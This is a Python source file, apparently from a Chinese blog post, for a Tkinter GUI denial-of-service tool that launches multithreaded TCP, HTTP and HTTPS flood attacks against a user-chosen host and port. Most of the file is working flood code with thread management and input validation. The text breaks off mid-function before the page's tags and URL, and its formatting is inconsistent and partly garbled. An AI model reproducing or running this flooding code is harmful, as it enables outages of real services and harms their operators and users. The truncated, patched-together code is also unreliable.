import tkinter as tk
from tkinter import messagebox
import socket
import threading
import time
import logging
import re
import asyncio
import aiohttp
# Set up logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Global variable to manage threads
attack_threads = []
running = False # Global variable to control the attack state
# Function to start the attack
def start_attack():
global running
running = True # Set running to True when starting the attack
try:
# Retrieve and validate inputs
target = target_entry.get().strip()
port = port_entry.get().strip()
attack_type = attack_type_var.get().strip()
payload = payload_entry.get().strip()
interval = interval_entry.get().strip()
num_threads = num_threads_entry.get().strip()
# Check for empty inputs
if not all([target, port, attack_type, payload, interval, num_threads]):
raise ValueError("请输入所有参数")
# Validate port
port = validate_port(port)
# Validate interval
interval = validate_positive_float(interval)
# Validate number of threads
num_threads = validate_positive_integer(num_threads)
# Validate target (IP or domain)
if not validate_ip(target) and not validate_domain(target):
raise ValueError("ip地址错误")
# Start attack based on type
for _ in range(num_threads):
if attack_type == 'TCP':
thread = threading.Thread(target=send_tcp_flood, args=(target, port, payload.encode(), interval))
elif attack_type == 'HTTP':
thread = threading.Thread(target=asyncio.run, args=(send_async_http_flood(target, port, payload.encode(), interval),))
elif attack_type == 'HTTPS':
thread = threading.Thread(target=asyncio.run, args=(send_async_https_flood(target, port, payload.encode(), interval),))
attack_threads.append(thread)
thread.start()
messagebox.showinfo("Success", "启动成功!")
except ValueError as ve:
messagebox.showerror("Input Error", str(ve))
except Exception as e:
messagebox.showerror("Error", f"{e}")
# Dotted-quad IPv4 pattern: four decimal octets in the range 0-255.
# Compiled once at import time instead of on every call.
_IPV4_PATTERN = re.compile(
    r'((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
    r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
)


def validate_ip(ip):
    """Return True if *ip* is a dotted-quad IPv4 address, else False.

    Each of the four octets must be a decimal number from 0 to 255.
    Leading zeros (e.g. ``"01.02.03.04"``) are accepted, as before.

    The whole string must match: ``fullmatch`` is used rather than
    ``match`` with a trailing ``$``, because ``$`` also matches just
    before a final newline and would let ``"1.2.3.4\\n"`` through.
    """
    return _IPV4_PATTERN.fullmatch(ip) is not None
# Hostname pattern: one or more dot-terminated labels followed by an
# alphabetic top-level label of at least two letters.
_DOMAIN_PATTERN = re.compile(
    r'(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}'
)


def validate_domain(domain):
    """Return True if *domain* looks like a dotted domain name, else False.

    Every label before the final one is 1-63 characters of ASCII letters,
    digits and hyphens, and may not start or end with a hyphen. The final
    label must be at least two ASCII letters, so single-label names such
    as ``"localhost"`` are rejected.

    ``fullmatch`` is used so that a trailing newline is rejected; a
    ``$`` anchor with ``match`` would accept ``"example.com\\n"``.
    """
    return _DOMAIN_PATTERN.fullmatch(domain) is not None
def validate_port(port):
    """Convert *port* to an int and check that it is a valid port number.

    Args:
        port: A value accepted by ``int()``, typically a string.

    Returns:
        The port as an ``int`` in the range 1-65535.

    Raises:
        ValueError: If *port* cannot be parsed as an integer, or if the
            parsed value lies outside 1-65535. The two cases carry
            different messages.
    """
    # Only the conversion sits inside the try block. Previously the range
    # check was inside it too, so its ValueError was caught by the handler
    # below and replaced with the "must be an integer" message.
    try:
        number = int(port)
    except ValueError:
        raise ValueError("端口需要是个整数") from None

    if not 1 <= number <= 65535:
        raise ValueError("端口在 1 到 65535之间")
    return number
def validate_positive_float(value):
    """Convert *value* to a float and check that it is positive and finite.

    Args:
        value: A value accepted by ``float()``, typically a string.

    Returns:
        The parsed ``float``, strictly greater than zero and finite.

    Raises:
        ValueError: If *value* cannot be parsed, is zero or negative, or
            is ``nan`` / ``inf``.
    """
    # The message now says "must be a positive number"; the old text said
    # "must be an integer", which is wrong for a field that accepts 0.5.
    message = "需要是个正数"
    try:
        number = float(value)
    except ValueError:
        raise ValueError(message) from None

    # A chained comparison rejects nan (every comparison with nan is
    # False) and +inf as well as non-positive values. The previous
    # `value <= 0` test let both nan and inf through.
    if not 0 < number < float("inf"):
        raise ValueError(message)
    return number
def validate_positive_integer(value):
    """Convert *value* to an int and require it to be greater than zero.

    Args:
        value: A value accepted by ``int()``, typically a string.

    Returns:
        The parsed ``int``, strictly greater than zero.

    Raises:
        ValueError: If *value* cannot be parsed as an integer or is zero
            or negative. Both cases use the same message.
    """
    message = "需要是个整数"
    try:
        number = int(value)
    except ValueError:
        raise ValueError(message)

    if number > 0:
        return number
    raise ValueError(message)
def stop_attack():
global running
running = False # Set running to False to stop the attack
for thread in attack_threads:
if thread.is_alive():
thread.join() # Wait for the thread to complete
attack_threads.clear() # Clear the list of threads
messagebox.showinfo("Stopped", "停止成功")
# Function to send TCP flood attack
def send_tcp_flood(target, port, payload, interval):
while running: # Check if running is True
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, port))
s.send(payload)
time.sleep(interval)
except Exception as e:
logging.error(f"TCP 连接失败: {e}")
break # Exit the loop on error
# Asynchronous function to send HTTP flood attack
async def send_async_http_flood(target, port, payload, interval):
url = f"http://{target}:{port}"
async with aiohttp.ClientSession() as session:
while running: # Check if running is True
try:
async with session.get(url, data=payload) as response:
logging.info(f"
标签:target,attack,ddos,threads,简单,import,validate,port
From: https://www.cnblogs.com/qcy-blog/p/18630629